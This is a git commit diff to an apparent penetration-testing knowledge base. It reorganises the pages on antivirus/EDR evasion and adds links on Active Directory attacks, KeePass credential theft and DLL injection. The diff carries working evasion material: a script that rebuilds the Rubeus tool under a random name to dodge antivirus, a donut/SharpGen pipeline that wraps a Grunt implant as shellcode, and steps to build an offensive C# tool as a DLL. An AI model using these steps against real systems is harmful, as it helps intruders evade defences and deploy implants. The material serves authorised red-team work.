[AHK] Automatic update 👽

SUMMARY.md

@@ -21,8 +21,10 @@
     * [Attack Trusts](pentest/infrastructure/ad/attack-trusts.md)
     * [Attack RODCs](pentest/infrastructure/ad/attack-rodc.md)
     * [AV / EDR Evasion](pentest/infrastructure/ad/av-edr-evasion/README.md)
-      - [.NET Config Loader](pentest/infrastructure/ad/av-edr-evasion/dotnet-config-loader.md)
-      - [.NET Reflective Assembly](pentest/infrastructure/ad/av-edr-evasion/dotnet-reflective-assembly.md)
+      - [.NET Assembly](pentest/infrastructure/ad/av-edr-evasion/dotnet-assembly/README.md)
+        * [.NET Config Loader](pentest/infrastructure/ad/av-edr-evasion/dotnet-assembly/dotnet-config-loader.md)
+        * [.NET In-Memory Assembly](pentest/infrastructure/ad/av-edr-evasion/dotnet-assembly/dotnet-in-memory-assembly.md)
+        * [.NET Reflective Assembly](pentest/infrastructure/ad/av-edr-evasion/dotnet-assembly/dotnet-reflective-assembly.md)
       - [AMSI Bypass](pentest/infrastructure/ad/av-edr-evasion/amsi-bypass.md)
       - [Application Whitelist Bypass](pentest/infrastructure/ad/av-edr-evasion/application-whitelist-bypass.md)
       - [AppLocker Bypass](pentest/infrastructure/ad/av-edr-evasion/applocker-bypass.md)

pentest/infrastructure/ad/README.md

@@ -202,6 +202,11 @@ $ bloodhound-import -du neo4j -dp 'Passw0rd!' 20190115133114*.json
 - [https://github.com/fortalice/bofhound](https://github.com/fortalice/bofhound)
 - [https://github.com/fortalice/pyldapsearch](https://github.com/fortalice/pyldapsearch)
 
+##### BOFHound
+
+- [https://falconforce.nl/soaphound-tool-to-collect-active-directory-data-via-adws/](https://falconforce.nl/soaphound-tool-to-collect-active-directory-data-via-adws/)
+- [https://github.com/FalconForceTeam/SOAPHound](https://github.com/FalconForceTeam/SOAPHound)
+
 
 #### Cypher (Neo4j)
 

pentest/infrastructure/ad/av-edr-evasion/README.md

@@ -19,6 +19,8 @@
 
 [**Best EDR Of The Market (BEOTM)**](https://xacone.github.io/BestEdrOfTheMarket.html)
 
+[**Sensecon 23: from Windows drivers to an almost fully working EDR**](https://sensepost.com/blog/2024/sensecon-23-from-windows-drivers-to-an-almost-fully-working-edr/)
+
 
 
 
@@ -311,79 +313,3 @@ PS > New-PSArmoury -ValidateOnly -Config PSArmoury.json
 PS > New-PSArmoury -Path armored.ps1 -Config PSArmoury.json
 PS > cat -raw .\armored.ps1 | iex
 ```
-
-
-
-### .NET Obfuscators
-
-- [https://github.com/NotPrab/.NET-Obfuscator](https://github.com/NotPrab/.NET-Obfuscator)
-- [https://github.com/Flangvik/ObfuscatedSharpCollection](https://github.com/Flangvik/ObfuscatedSharpCollection)
-- [https://www.r-tec.net/r-tec-blog-net-assembly-obfuscation-for-memory-scanner-evasion.html](https://www.r-tec.net/r-tec-blog-net-assembly-obfuscation-for-memory-scanner-evasion.html)
-
-Hide command line by overwriting `args` to read values from a text file:
-
-```csharp
-string line = File.ReadLines("cmd.txt").FirstOrDefault();
-args = line.Split(' ');
-```
-
-
-#### Tools
-
-- [https://github.com/yck1509/ConfuserEx](https://github.com/yck1509/ConfuserEx)
-- [https://github.com/XenocodeRCE/neo-ConfuserEx](https://github.com/XenocodeRCE/neo-ConfuserEx)
-- [https://github.com/dr4k0nia/XorStringsNET](https://github.com/dr4k0nia/XorStringsNET)
-- [https://github.com/0xb11a1/yetAnotherObfuscator](https://github.com/0xb11a1/yetAnotherObfuscator)
-
-##### InvisibilityCloak
-
-- [https://github.com/h4wkst3r/InvisibilityCloak](https://github.com/h4wkst3r/InvisibilityCloak)
-
-```
-PS > wget https://github.com/h4wkst3r/InvisibilityCloak/raw/main/InvisibilityCloak.py -o InvisibilityCloak.py
-PS > git clone https://github.com/GhostPack/Rubeus
-PS > python .\InvisibilityCloak.py -d .\Rubeus\ -n (-join ((65..90) + (97..122) | Get-Random -Count 16 | % {[char]$_})) -m reverse
-PS > cd Rubeus
-PS > devenv /build Release .\ChOVuwPZcNQmXtKF.sln
-```
-
-{% code title="InvisibilityCloak.ps1" %}
-```powershell
-$repo = "GhostPack/Rubeus"
-
-$cloak = "C:\Users\user\Desktop\Tools\InvisibilityCloak.py"
-$devenv = "C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\devenv.com"
-
-$target = $repo.Split('/')[1]
-$obf = -join ((65..90) + (97..122) | Get-Random -Count 16 | % {[char]$_})
-git clone "https://github.com/$repo" "C:\Windows\Temp\$target"
-python $cloak -d "C:\Windows\Temp\$target" -n $obf -m reverse
-& $devenv /build Release "C:\Windows\Temp\$target\$obf.sln"
-mv "C:\Windows\Temp\$target\$obf\bin\Release\$obf.exe" "\\vmware-host\Shared Folders\share-host\$obf.exe"
-#Remove-Item -Recurse -Force "C:\Windows\Temp\$target"
-```
-{% endcode %}
-
-
-
-### SharpSploit
-
-- [https://github.com/cobbr/SharpSploit](https://github.com/cobbr/SharpSploit)
-- [https://github.com/cobbr/SharpSploit/blob/master/SharpSploit/SharpSploit%20-%20Quick%20Command%20Reference.md](https://github.com/cobbr/SharpSploit/blob/master/SharpSploit/SharpSploit%20-%20Quick%20Command%20Reference.md)
-
-
-#### SharpGen
-
-- [https://github.com/cobbr/SharpGen](https://github.com/cobbr/SharpGen)
-- [https://cobbr.io/SharpGen.html](https://cobbr.io/SharpGen.html)
-
-##### Execution.ShellCode
-
-```
-$ ~/tools/PEzor/deps/donut/donut -i GruntHTTP.exe -o grunt.bin
-$ echo -n 'var shellcode = Convert.FromBase64String("' > shellcode.txt
-$ echo -n `base64 -w0 grunt.bin` >> shellcode.txt
-$ echo '");' >> shellcode.txt
-$ echo 'ShellCode.ShellCodeExecute(shellcode);' >> shellcode.txt
-$ ~/.dotnet/dotnet bin/Debug/netcoreapp2.1/SharpGen.dll -f payload.exe -s shellcode.txt -c Shell -d net40
-```

pentest/infrastructure/ad/av-edr-evasion/donet-assembly/README.md

@@ -0,0 +1,118 @@
+# .NET Assembly
+
+
+
+
+## Patch Environment.Exit
+
+- [https://www.mdsec.co.uk/2020/08/massaging-your-clr-preventing-environment-exit-in-in-process-net-assemblies/](https://www.mdsec.co.uk/2020/08/massaging-your-clr-preventing-environment-exit-in-in-process-net-assemblies/)
+- [https://www.outflank.nl/blog/2024/02/01/unmanaged-dotnet-patching/](https://www.outflank.nl/blog/2024/02/01/unmanaged-dotnet-patching/)
+
+
+
+
+## C\# to Unmanaged DLL
+
+* [https://blog.xpnsec.com/rundll32-your-dotnet/](https://blog.xpnsec.com/rundll32-your-dotnet/)
+
+Creating assembly with DLL exports from C# code:
+
+1. Select your favorite C# offensive tool.
+2. Install [DllExport](https://www.nuget.org/packages/DllExport/) package via "Manage NuGet Packages for Solution" in VS.
+3. Configure DllExport like on the screenshot below and click "Apply".
+4. Agree to reload the solution.
+5. Edit the Main function code to work with no arguments passed so that the signature looks like `static void Main()`.
+6. Add `[DllExport]` attribute before the Main function.
+7. Check "Allow unsafe code" and "Optimize code" boxes in Build tab of the solution.
+8. Build the solution as Release x64 DLL assembly.
+9. (Optional) Obfuscate the assembly with something like [Confuser](https://github.com/XenocodeRCE/neo-ConfuserEx).
+
+![DllExport Configuration](/.gitbook/assets/010.png)
+
+The resulting DLL will be placed in `.\bin\x64\Release\x64\` directory.
+
+{% hint style="warning" %}
+Author's note: *I’m not sure why it requires so much finessing, but I’m open to any optimizations or explanations if anyone knows. Specifically, only the DLL in the `\x64\` directory will work, for some reason the one that’s under `\Release\` does not contain the entrypoint that should be generated by `[DllExport]`, even though it’s built at the same time as the one in `\x64\`.*
+{% endhint %}
+
+
+
+
+## .NET Obfuscators
+
+- [https://github.com/NotPrab/.NET-Obfuscator](https://github.com/NotPrab/.NET-Obfuscator)
+- [https://github.com/Flangvik/ObfuscatedSharpCollection](https://github.com/Flangvik/ObfuscatedSharpCollection)
+- [https://www.r-tec.net/r-tec-blog-net-assembly-obfuscation-for-memory-scanner-evasion.html](https://www.r-tec.net/r-tec-blog-net-assembly-obfuscation-for-memory-scanner-evasion.html)
+
+Hide command line by overwriting `args` to read values from a text file:
+
+```csharp
+string line = File.ReadLines("cmd.txt").FirstOrDefault();
+args = line.Split(' ');
+```
+
+
+
+### Tools
+
+- [https://github.com/yck1509/ConfuserEx](https://github.com/yck1509/ConfuserEx)
+- [https://github.com/XenocodeRCE/neo-ConfuserEx](https://github.com/XenocodeRCE/neo-ConfuserEx)
+- [https://github.com/dr4k0nia/XorStringsNET](https://github.com/dr4k0nia/XorStringsNET)
+- [https://github.com/0xb11a1/yetAnotherObfuscator](https://github.com/0xb11a1/yetAnotherObfuscator)
+
+
+#### InvisibilityCloak
+
+- [https://github.com/h4wkst3r/InvisibilityCloak](https://github.com/h4wkst3r/InvisibilityCloak)
+
+```
+PS > wget https://github.com/h4wkst3r/InvisibilityCloak/raw/main/InvisibilityCloak.py -o InvisibilityCloak.py
+PS > git clone https://github.com/GhostPack/Rubeus
+PS > python .\InvisibilityCloak.py -d .\Rubeus\ -n (-join ((65..90) + (97..122) | Get-Random -Count 16 | % {[char]$_})) -m reverse
+PS > cd Rubeus
+PS > devenv /build Release .\ChOVuwPZcNQmXtKF.sln
+```
+
+{% code title="InvisibilityCloak.ps1" %}
+```powershell
+$repo = "GhostPack/Rubeus"
+
+$cloak = "C:\Users\user\Desktop\Tools\InvisibilityCloak.py"
+$devenv = "C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\devenv.com"
+
+$target = $repo.Split('/')[1]
+$obf = -join ((65..90) + (97..122) | Get-Random -Count 16 | % {[char]$_})
+git clone "https://github.com/$repo" "C:\Windows\Temp\$target"
+python $cloak -d "C:\Windows\Temp\$target" -n $obf -m reverse
+& $devenv /build Release "C:\Windows\Temp\$target\$obf.sln"
+mv "C:\Windows\Temp\$target\$obf\bin\Release\$obf.exe" "\\vmware-host\Shared Folders\share-host\$obf.exe"
+#Remove-Item -Recurse -Force "C:\Windows\Temp\$target"
+```
+{% endcode %}
+
+
+
+
+## SharpSploit
+
+- [https://github.com/cobbr/SharpSploit](https://github.com/cobbr/SharpSploit)
+- [https://github.com/cobbr/SharpSploit/blob/master/SharpSploit/SharpSploit%20-%20Quick%20Command%20Reference.md](https://github.com/cobbr/SharpSploit/blob/master/SharpSploit/SharpSploit%20-%20Quick%20Command%20Reference.md)
+
+
+
+### SharpGen
+
+- [https://github.com/cobbr/SharpGen](https://github.com/cobbr/SharpGen)
+- [https://cobbr.io/SharpGen.html](https://cobbr.io/SharpGen.html)
+
+
+#### Execution.ShellCode
+
+```
+$ ~/tools/PEzor/deps/donut/donut -i GruntHTTP.exe -o grunt.bin
+$ echo -n 'var shellcode = Convert.FromBase64String("' > shellcode.txt
+$ echo -n `base64 -w0 grunt.bin` >> shellcode.txt
+$ echo '");' >> shellcode.txt
+$ echo 'ShellCode.ShellCodeExecute(shellcode);' >> shellcode.txt
+$ ~/.dotnet/dotnet bin/Debug/netcoreapp2.1/SharpGen.dll -f payload.exe -s shellcode.txt -c Shell -d net40
+```

pentest/infrastructure/ad/av-edr-evasion/donet-assembly/dotnet-in-memory-assembly.md

@@ -0,0 +1,7 @@
+# .NET In-Memory Assembly
+
+- [https://github.com/etormadiv/HostingCLR](https://github.com/etormadiv/HostingCLR)
+- [https://github.com/b4rtik/metasploit-execute-assembly](https://github.com/b4rtik/metasploit-execute-assembly)
+- [https://github.com/3gstudent/Homework-of-C-Language/blob/master/HostingCLR_with_arguments_XOR.cpp](https://github.com/3gstudent/Homework-of-C-Language/blob/master/HostingCLR_with_arguments_XOR.cpp)
+- [https://github.com/mez-0/InMemoryNET](https://github.com/mez-0/InMemoryNET)
+- [https://github.com/anthemtotheego/InlineExecute-Assembly](https://github.com/anthemtotheego/InlineExecute-Assembly)

pentest/infrastructure/ad/av-edr-evasion/dotnet-reflective-assembly.md → pentest/infrastructure/ad/av-edr-evasion/donet-assembly/dotnet-reflective-assembly.md

@@ -100,30 +100,3 @@ type = assembly.GetType('Loader.Program')
 type.GetMethod('Main').Invoke(Activator.CreateInstance(type), None)
 ```
 {% endcode %}
-
-
-
-
-## C\# to Unmanaged DLL
-
-* [https://blog.xpnsec.com/rundll32-your-dotnet/](https://blog.xpnsec.com/rundll32-your-dotnet/)
-
-Creating assembly with DLL exports from C# code:
-
-1. Select your favorite C# offensive tool.
-2. Install [DllExport](https://www.nuget.org/packages/DllExport/) package via "Manage NuGet Packages for Solution" in VS.
-3. Configure DllExport like on the screenshot below and click "Apply".
-4. Agree to reload the solution.
-5. Edit the Main function code to work with no arguments passed so that the signature looks like `static void Main()`.
-6. Add `[DllExport]` attribute before the Main function.
-7. Check "Allow unsafe code" and "Optimize code" boxes in Build tab of the solution.
-8. Build the solution as Release x64 DLL assembly.
-9. (Optional) Obfuscate the assembly with something like [Confuser](https://github.com/XenocodeRCE/neo-ConfuserEx).
-
-![DllExport Configuration](/.gitbook/assets/010.png)
-
-The resulting DLL will be placed in `.\bin\x64\Release\x64\` directory.
-
-{% hint style="warning" %}
-Author's note: *I’m not sure why it requires so much finessing, but I’m open to any optimizations or explanations if anyone knows. Specifically, only the DLL in the `\x64\` directory will work, for some reason the one that’s under `\Release\` does not contain the entrypoint that should be generated by `[DllExport]`, even though it’s built at the same time as the one in `\x64\`.*
-{% endhint %}

pentest/infrastructure/ad/credential-harvesting/keepass.md

@@ -116,3 +116,11 @@ Cmd > copy C:\KeeFarceReborn\KeeFarceRebornPlugin\bin\Release\KeeFarceRebornPlug
 ### KeePwn
 
 - [https://github.com/Orange-Cyberdefense/KeePwn](https://github.com/Orange-Cyberdefense/KeePwn)
+
+
+
+### ThievingFox
+
+- [https://blog.slowerzs.net/posts/thievingfox/](https://blog.slowerzs.net/posts/thievingfox/)
+- [https://github.com/Slowerzs/ThievingFox/tree/main/keepassfox](https://github.com/Slowerzs/ThievingFox/tree/main/keepassfox)
+- [https://github.com/Slowerzs/ThievingFox/tree/main/keepassxcfox](https://github.com/Slowerzs/ThievingFox/tree/main/keepassxcfox)

pentest/infrastructure/ad/credential-harvesting/sspi.md

@@ -15,6 +15,7 @@ description: Security Support Provider Interface
 - [https://github.com/ly4k/Certipy/blob/2780d5361121dd4ec79da3f64cfb1984c4f779c6/certipy/lib/sspi/kerberos.py](https://github.com/ly4k/Certipy/blob/2780d5361121dd4ec79da3f64cfb1984c4f779c6/certipy/lib/sspi/kerberos.py#L50)
 - [https://xakep.ru/2023/06/14/tgt-delegation/](https://xakep.ru/2023/06/14/tgt-delegation/)
 - [https://github.com/MzHmO/articles/tree/main/TGT%20Deleg](https://github.com/MzHmO/articles/tree/main/TGT%20Deleg)
+- [https://swarm.ptsecurity.com/python-sspi-teaching-impacket-to-respect-windows-sso/](https://swarm.ptsecurity.com/python-sspi-teaching-impacket-to-respect-windows-sso/)
 - [https://gist.github.com/snovvcrash/ff867dbd922ff2c36f480c0a61819f29](https://gist.github.com/snovvcrash/ff867dbd922ff2c36f480c0a61819f29)
 
 

pentest/infrastructure/ad/token-manipulation.md

@@ -35,6 +35,14 @@ PS > $impToken.Groups
 
 
 
+## Impersonate to Request an ST
+
+- [https://github.com/foxlox/GIUDA](https://github.com/foxlox/GIUDA)
+- [https://github.com/MzHmO/TGSThief](https://github.com/MzHmO/TGSThief)
+
+
+
+
 ## Tools
 
 - [https://github.com/dievus/msImpersonate](https://github.com/dievus/msImpersonate)

pentest/web/README.md

@@ -39,6 +39,17 @@ git log $TARGET_FILE
 
 
 
+## Output Redirection
+
+- [https://codewhitesec.blogspot.com/2015/03/sh-or-getting-shell-environment-from.html](https://codewhitesec.blogspot.com/2015/03/sh-or-getting-shell-environment-from.html)
+
+```bash
+sh -c $@|sh . echo echo test > /tmp/.1 && ls -la /tmp/.1 && cat /tmp/.1 && rm /tmp/.1
+```
+
+
+
+
 ## Tools
 
 - [https://infosecwriteups.com/cool-recon-techniques-every-hacker-misses-1c5e0e294e89](https://infosecwriteups.com/cool-recon-techniques-every-hacker-misses-1c5e0e294e89)

redteam/maldev/code-injection/README.md

@@ -432,6 +432,7 @@ VerifierEnumerateResource
 ### sRDI
 
 - [https://github.com/monoxgas/sRDI](https://github.com/monoxgas/sRDI)
+- [https://blog.malicious.group/writing-your-own-rdi-srdi-loader-using-c-and-asm/](https://blog.malicious.group/writing-your-own-rdi-srdi-loader-using-c-and-asm/)
 
 
 

redteam/maldev/code-injection/dll-injectors.md

@@ -90,14 +90,15 @@ According to [this](https://github.com/rapid7/metasploit-framework/blob/09fe84fa
 
 
 
-## Reflective DLL Injection
+## Reflective DLL Injection (RDI)
 
 * [https://github.com/stephenfewer/ReflectiveDLLInjection#overview](https://github.com/stephenfewer/ReflectiveDLLInjection#overview)
 * [https://github.com/dismantl/ImprovedReflectiveDLLInjection](https://github.com/dismantl/ImprovedReflectiveDLLInjection)
 * [https://github.com/Moriarty2016/NimRDI](https://github.com/Moriarty2016/NimRDI)
 * [https://bruteratel.com/research/feature-update/2021/06/01/PE-Reflection-Long-Live-The-King/](https://bruteratel.com/research/feature-update/2021/06/01/PE-Reflection-Long-Live-The-King/)
 * [https://github.com/Krypteria/AtlasLdr](https://github.com/Krypteria/AtlasLdr)
 * [https://oldboy21.github.io/posts/2023/12/all-i-want-for-christmas-is-reflective-dll-injection/](https://oldboy21.github.io/posts/2023/12/all-i-want-for-christmas-is-reflective-dll-injection/)
+* [https://blog.malicious.group/writing-your-own-rdi-srdi-loader-using-c-and-asm/](https://blog.malicious.group/writing-your-own-rdi-srdi-loader-using-c-and-asm/)
 
 
 

redteam/maldev/pic-shellcode.md

@@ -7,7 +7,7 @@ description: Position-Independent Code / Shellcode
 - [https://www.ired.team/offensive-security/code-injection-process-injection/writing-and-compiling-shellcode-in-c](https://www.ired.team/offensive-security/code-injection-process-injection/writing-and-compiling-shellcode-in-c)
 - [https://www.codeproject.com/Articles/5304605/Creating-Shellcode-from-any-Code-Using-Visual-Stud](https://www.codeproject.com/Articles/5304605/Creating-Shellcode-from-any-Code-Using-Visual-Stud)
 
-Compile runner with nasm & MinGW (stolen from [PIC-Get-Privileges](https://github.com/paranoidninja/PIC-Get-Privileges)):
+Compile runner with nasm & MinGW (stolen from [PIC-Get-Privileges](https://github.com/paranoidninja/PIC-Get-Privileges/blob/main/runshellcode.asm)):
 
 ```asm
 ; Compile with: